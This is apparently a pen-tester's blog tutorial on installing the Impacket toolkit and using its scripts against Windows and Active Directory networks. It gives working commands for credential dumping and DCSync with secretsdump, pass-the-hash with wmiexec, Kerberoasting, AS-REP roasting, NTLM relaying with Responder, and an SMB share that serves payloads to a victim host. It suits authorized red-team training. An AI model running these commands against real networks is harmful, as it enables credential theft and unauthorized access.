Impacket is a Python library plus a pile of script wrappers for talking to Windows network protocols (SMB, MSRPC, NTLM, Kerberos). On a red team or internal pen test, it’s the difference between “I can move around this network” and “I’m staring at port 445 wondering what to do.” This post covers installing it without breaking your global Python and walks through the handful of scripts you’ll actually use most.
What is Impacket#
Impacket is a collection of Python classes and example scripts for the network protocols Windows speaks: SMB, MSRPC, NTLM, Kerberos. Once it’s installed, you can authenticate, enumerate, run remote commands, dump credentials, and relay authentication — all without dropping anything on the target.
Impacket includes useful tools and utilities, including:
smbclient.py: An SMB client for interacting with shares and performing file operationssamrdump.py: A tool for enumerating users and groups via the SAMR RPC interfacewmiexec.py: A semi-interactive command execution approach using WMIpsexec.py: Remote command execution via SMB and the Windows Service Control Manager (SCM)secretsdump.py: Credential material extraction (SAM/LSA/NTDS techniques)GetUserSPNs.py/GetNPUsers.py: ticket requests for offline analysis (when configured in AD)
Installing Impacket: The professional way#
Step 1: Install Python and pip#
Before installing Impacket, you’ll need to ensure you have Python and
pip installed on your system. Many Linux distributions ship with Python 3, but macOS does not always include python3 by default. To check, open a terminal window and type:
python3 --versionIf you see output that looks like Python 3.10.6, you are good to go. Impacket works best with Python 3.8+.
Step 2: install via pipx#
While you can install Impacket directly into your global Python environment with pip, I strongly advise against it. This can lead to “dependency hell” where different tools require conflicting versions of libraries.
Instead, use pipx. pipx installs tools in isolated environments and exposes their commands globally.
# Install pipx
python3 -m pip install --user pipx
python3 -m pipx ensurepath
# Reload your shell
source ~/.bashrc # or ~/.zshrcStep 3: Installing Impacket via pipx#
Now, install Impacket. If you need the latest features, install it directly from the GitHub repository:
pipx install git+https://github.com/fortra/impacket.gitThis command creates a dedicated virtual environment for Impacket, installs all dependencies, and links all the scripts (secretsdump.py, wmiexec.py, etc.) to your path. You can now run them from anywhere!
To update it later, simply run:
pipx upgrade impacketIf you want to pin to a specific branch or commit for repeatable tooling during an engagement, reinstall with an explicit ref:
pipx install --force git+https://github.com/fortra/impacket.git@<branch-or-commit>The tools you’ll actually use#
Impacket ships ~60 scripts. In practice you’ll use a small subset most of the time. These are the ones worth knowing cold.
1. secretsdump.py: credential extraction#
secretsdump.py is the most-used script in the suite. It dumps secrets from
a remote machine using a handful of different techniques, none of which
require dropping an agent on the target.
Key Features:
- Dumps NTLM hashes from the SAM database.
- Dumps LSA secrets.
- Dumps the NTDS.dit (Active Directory database) via DRSUAPI.
Usage Examples:
Dump local SAM hashes using local admin credentials:
secretsdump.py 'DOMAIN/User:Password@192.168.1.10'Dump the entire Domain Controller database (DCSync attack):
secretsdump.py -just-dc-ntlm 'DOMAIN/DomainAdmin:Password@DC_IP'2. smbserver.py: stand up an SMB share#
Need to exfiltrate data or host a payload for a target to download? smbserver.py sets up a lightweight SMB server in seconds.
Usage:
# Share the current directory as "SHARE"
sudo smbserver.py SHARE . -smb2supportOn the victim machine, you can now access your files:
copy \\YOUR_IP\SHARE\payload.exe C:\Windows\Temp\Pro Tip: This is also great for capturing NTLMv2 hashes if you can trick a user or service into authenticating to your share.
3. wmiexec.py: WMI-based remote command execution#
wmiexec.py allows you to execute commands on a remote Windows system using the Windows Management Instrumentation (WMI) protocol, providing a semi-interactive shell.
Why use it over PsExec?
PsExec-style execution commonly involves creating a service on the target, which is often high-signal to defenders. wmiexec.py uses WMI to create processes and is frequently quieter than service-based approaches, but it can still generate logs and may touch the filesystem indirectly (for example, for output retrieval) depending on configuration and target settings.
Usage:
wmiexec.py 'DOMAIN/User:Password@TargetIP'If you only have the hash (Pass-the-Hash):
wmiexec.py -hashes :NTLM_HASH 'DOMAIN/User@TargetIP'Advanced attacks: Authentication and relaying#
Kerberoasting with GetUserSPNs.py#
Kerberoasting is a technique to request service tickets (TGS) for service accounts and crack them offline to recover the plaintext password.
Execution:
# Request TGS for all users with SPNs
GetUserSPNs.py 'DOMAIN/User:Password' -dc-ip 192.168.1.5 -requestThis will output Hashcat-formatted hashes. Save them and crack them!
AS-REP Roasting with GetNPUsers.py#
This attack targets users with “Do not require preauthentication” enabled. You don’t even need a valid domain user password—just a username list!
Execution:
GetNPUsers.py 'DOMAIN/' -usersfile users.txt -no-pass -format hashcat -outputfile asreproast.txtNTLM Relaying with ntlmrelayx.py#
ntlmrelayx.py is a beast. It listens for incoming NTLM authentication requests (via SMB, HTTP, etc.) and relays them to other machines to execute commands or dump data.
Scenario:
You are on a local network. You start Responder to poison LLMNR/NBT-NS, but you turn off the SMB and HTTP servers in Responder. You pass those requests to ntlmrelayx.
Configure Responder: Edit
Responder.confand setSMB = OffandHTTP = Off.Start ntlmrelayx:
ntlmrelayx.py -tf targets.txt -smb2supportStart Responder:
responder -I eth0
When a victim tries to access a non-existent resource, Responder directs them to you. ntlmrelayx grabs their credentials and relays them to the machines in targets.txt. If the victim is an admin on a target, you get a shell!
Conclusion#
Impacket is one of those tools where the install is the easy part — the hard
part is knowing which script to reach for and how to chain them together with
whatever else you’ve got loaded. Most of the techniques in this post
(Kerberoasting, AS-REP roasting, NTLM relaying, DCSync via secretsdump)
will appear in some form on every internal engagement that touches Active
Directory.
The big trap to avoid: don’t sudo pip install impacket into your system
Python. pipx keeps it isolated and updateable, which matters when the
project ships fixes faster than your distro packages it.
For more information, check out the official Impacket repository: https://github.com/fortra/impacket
